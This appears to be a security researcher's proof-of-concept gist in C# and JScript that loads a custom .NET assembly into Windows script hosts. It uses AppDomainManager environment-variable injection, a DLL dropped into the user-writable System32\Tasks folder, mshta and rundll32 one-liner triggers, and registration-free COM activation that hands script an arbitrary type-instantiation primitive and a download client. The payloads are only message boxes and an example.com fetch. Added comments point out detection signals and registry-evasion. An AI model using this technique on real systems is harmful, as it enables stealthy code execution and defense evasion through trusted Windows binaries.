Create a .NET type dynamically at runtime and execute it from script. Prototype of DynamicWrapperX, but not posting that publicly
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
using System.Reflection;
using System.Reflection.Emit;
using System.Collections;
using System.Collections.Generic;
using System.Net;
/// <summary>
/// Custom <see cref="AppDomainManager"/>. When a process starts with the
/// APPDOMAIN_MANAGER_ASM / APPDOMAIN_MANAGER_TYPE environment variables naming this
/// assembly and type (the build notes below show the exact values), the runtime
/// instantiates it and calls <see cref="InitializeNewDomain"/> while the domain is being
/// created. From a defender's point of view, those two variables appearing in a process
/// environment, or an AppDomainManager type that is not the expected one, is the
/// observable signal for this technique.
/// </summary>
public sealed class MyAppDomainManager : AppDomainManager
{
    /// <summary>
    /// Runtime hook for the new domain. This implementation only displays a message box
    /// as proof of execution and leaves the domain configuration untouched; the original
    /// author notes that ApplicationBase and the assembly resolver could be adjusted here too.
    /// </summary>
    /// <param name="appDomainInfo">Setup information for the domain being initialized (unused).</param>
    public override void InitializeNewDomain(AppDomainSetup appDomainInfo)
    {
        // Proof-of-execution only; nothing about the domain is changed.
        System.Windows.Forms.MessageBox.Show("AppDomain - KaBoom!");
    }
}
/*
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:tasks.dll tasks.cs
set APPDOMAIN_MANAGER_ASM=tasks, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
set APPDOMAIN_MANAGER_TYPE=MyAppDomainManager
set COMPLUS_Version=v4.0.30319
copy tasks.dll C:\Windows\System32\Tasks\tasks.dll
copy tasks.dll C:\Windows\SysWow64\Tasks\tasks.dll
Simple One-Liner Triggers.
mshta.exe javascript:a=new%20ActiveXObject("System.Object");close();
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";a=new%20ActiveXObject("System.Object");close();
*/
namespace MyDLL
{
[ComVisible(true)]
[Guid("31D2B969-7608-426E-9D8E-A09FC9A5ACDC")]
[ClassInterface(ClassInterfaceType.None)]
[ProgId("MyDLL.Operations")]
public class Operations
{
    private const string Value2Text = "From VBS String Function";

    /// <summary>
    /// COM-creatable class published to script hosts under the ProgId "MyDLL.Operations".
    /// The script at the end of the gist activates it through a registration-free COM
    /// manifest, so the constructor and every public method below run inside that script
    /// host's process; the console line and the message box are the only side effects.
    /// </summary>
    public Operations()
    {
        Console.WriteLine("So It Begins");
    }

    /// <summary>Maps a one-letter selector to a fixed description string.</summary>
    /// <param name="sParameter">Selector; "a", "b" and "c" are recognised, anything else
    /// (including null) yields "Other". Comparison is ordinal, as with the original switch.</param>
    /// <returns>The description for the selector.</returns>
    [ComVisible(true)]
    public string getValue1(string sParameter)
    {
        if (sParameter == "a")
        {
            return "A was chosen";
        }
        if (sParameter == "b")
        {
            return "B was chosen";
        }
        if (sParameter == "c")
        {
            return "C was chosen";
        }
        return "Other";
    }

    /// <summary>Returns a constant string; used by the author to prove a VBS/JS caller can read a managed return value.</summary>
    /// <returns>The fixed text "From VBS String Function".</returns>
    [ComVisible(true)]
    public string getValue2()
    {
        return Value2Text;
    }

    /// <summary>Shows a message box as visible proof that managed code ran in the calling host.</summary>
    [ComVisible(true)]
    public void getValue3()
    {
        System.Windows.Forms.MessageBox.Show("Hey From My Assembly");
    }
}
[ComVisible(true)]
[Guid("31D2B969-7608-426E-9D8E-A09FC9A5DCAC")]
[ClassInterface(ClassInterfaceType.None)]
[ProgId("MyDLL.MyClassBuilder")]
public class MyClassBuilder
{
    /// <summary>
    /// COM-creatable factory published to script hosts under the ProgId "MyDLL.MyClassBuilder".
    /// Every public method is reachable from whichever script activates the object, and
    /// <see cref="Typer"/> in particular hands that script a generic "instantiate any
    /// resolvable .NET type" primitive. If this assembly turns up on a host, that is the
    /// capability to assess, not the message-box demo in Operations.
    /// </summary>
    public MyClassBuilder()
    {
        Console.WriteLine("So It Begins, My ClassBuilder");
    }

    /// <summary>
    /// Resolves a type by name and creates an instance of it with its parameterless constructor.
    /// </summary>
    /// <param name="inputString">Type name as accepted by <see cref="Type.GetType(string)"/>
    /// (assembly-qualified, or resolvable from mscorlib / the calling assembly).</param>
    /// <returns>A new instance of the resolved type.</returns>
    /// <remarks>
    /// No validation is applied to the caller-supplied name. Type.GetType returns null for an
    /// unresolvable name, in which case Activator.CreateInstance throws ArgumentNullException;
    /// a type without a public parameterless constructor makes CreateInstance throw MissingMethodException.
    /// </remarks>
    public object Typer(string inputString)
    {
        // See https://stackoverflow.com/questions/11107536/convert-string-to-type-in-c-sharp
        Type resolved = Type.GetType(inputString);
        return Activator.CreateInstance(resolved);
    }

    /// <summary>
    /// Writes the name of every exported enum type from every assembly currently loaded in the
    /// AppDomain to the console, one per line, in assembly-then-type order.
    /// </summary>
    public void getTypes()
    {
        List<Type> enumTypes = new List<Type>();
        Assembly[] loaded = AppDomain.CurrentDomain.GetAssemblies();
        for (int a = 0; a < loaded.Length; a++)
        {
            Type[] exported = loaded[a].GetExportedTypes();
            for (int t = 0; t < exported.Length; t++)
            {
                if (!exported[t].IsEnum)
                {
                    continue;
                }
                enumTypes.Add(exported[t]);
            }
        }
        foreach (Type enumType in enumTypes)
        {
            Console.WriteLine(enumType.ToString());
        }
    }

    /// <summary>
    /// Returns a fresh <see cref="System.Net.WebClient"/>. The gist's script uses it to fetch a
    /// URL, so the resulting network traffic is produced by the script host process that
    /// activated this object.
    /// </summary>
    /// <returns>A new WebClient with default settings.</returns>
    public System.Net.WebClient getWC() // Just an example ;-)
    {
        // Equivalent to Activator.CreateInstance(typeof(WebClient)): public parameterless ctor.
        return new WebClient();
    }
}
}
// JScript driver for tasks.dll. The manifest strings must stay UTF-16 text, as their XML
// declaration says; the host passes them to the activation-context API as-is.

// Sets a variable in this script host's process environment. Same effect as the inline
// WScript.Shell assignments in the original, just factored out; a fresh WScript.Shell is
// created per call exactly as before.
function setProcessEnv(name, value) {
    new ActiveXObject('WScript.Shell').Environment('Process')(name) = value;
}

// Builds an in-memory, registration-free COM activation context from manifestText and
// returns the object created for progid. Nothing is written to the registry (the manifest
// is handed over as text), so detection keyed on CLSID/ProgId registry writes will not
// see this path; Microsoft.Windows.ActCtx use from a script host, plus the image load of
// tasks.dll from the Tasks directory, are the observable events.
function activateFromManifest(progid, manifestText) {
    var ctx = new ActiveXObject("Microsoft.Windows.ActCtx"); // GUID {8fa7728f-b69b-4ee5-99f2-e2aa021bef28}
    ctx.ManifestText = manifestText;
    return ctx.CreateObject(progid);
}

// Runtime selection and the AppDomainManager handoff. APPDOMAIN_MANAGER_ASM/TYPE name the
// assembly and type defined in tasks.cs; TMP is the author's way of steering the lookup
// (the original comment says it controls the search path for unmanaged DLLs).
setProcessEnv('COMPLUS_Version', 'v4.0.30319');
// setProcessEnv('TMP', 'C:\\Users\\Research\\Documents\\');
setProcessEnv('TMP', 'c:\\Windows\\System32\\Tasks');
setProcessEnv('APPDOMAIN_MANAGER_ASM', 'tasks, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null');
setProcessEnv('APPDOMAIN_MANAGER_TYPE', 'MyAppDomainManager');

// First managed activation: starting the CLR is what makes it honour the variables above
// and load the AppDomainManager.
var o = new ActiveXObject("System.Object");

// Author's notes, kept for context: the assembly is expected under a system directory
// (C:\Windows\System32 for example), the CLR also probes a sub-directory named after the
// application, and C:\Windows\System32\Tasks is user-writable, which is why the assembly is
// found there. Ideally it would be dropped anywhere and loaded like DynamicWrapper.
var opsManifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?><assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3"><assemblyIdentity name="tasks" type="win32" version="0.0.0.0" /><description>Built with love by Casey Smith @subTee </description><clrClass name="MyDLL.Operations" clsid="{31D2B969-7608-426E-9D8E-A09FC9A5ACDC}" progid="MyDLL.Operations" runtimeVersion="v4.0.30319" threadingModel="Both" /><file name="tasks.dll"> </file></assembly>';
var ops = activateFromManifest("MyDLL.Operations", opsManifest);
ops.getValue3(); // Trigger message box

// NOTE(review): the clsid below ends in ...DCAD while the [Guid] on MyClassBuilder in
// tasks.cs ends in ...DCAC. It is not clear from this page whether reg-free activation
// keys on the clsid or only on the clrClass name attribute; the inconsistency is worth noting.
var builderManifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?><assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3"><assemblyIdentity name="tasks" type="win32" version="0.0.0.0" /><description>Built with love by Casey Smith @subTee </description><clrClass name="MyDLL.MyClassBuilder" clsid="{31D2B969-7608-426E-9D8E-A09FC9A5DCAD}" progid="MyDLL.MyClassBuilder" runtimeVersion="v4.0.30319" threadingModel="Both" /><file name="tasks.dll"> </file></assembly>';
var builder = activateFromManifest("MyDLL.MyClassBuilder", builderManifest);
// builder.getTypes();

// The HTTP fetch runs inside this script host process via the managed WebClient, so the
// request is attributed to the host (wscript/cscript/mshta), not to a .NET executable.
var client = builder.getWC();
var body = client.DownloadString("http://www.example.com");
WScript.StdOut.WriteLine(body);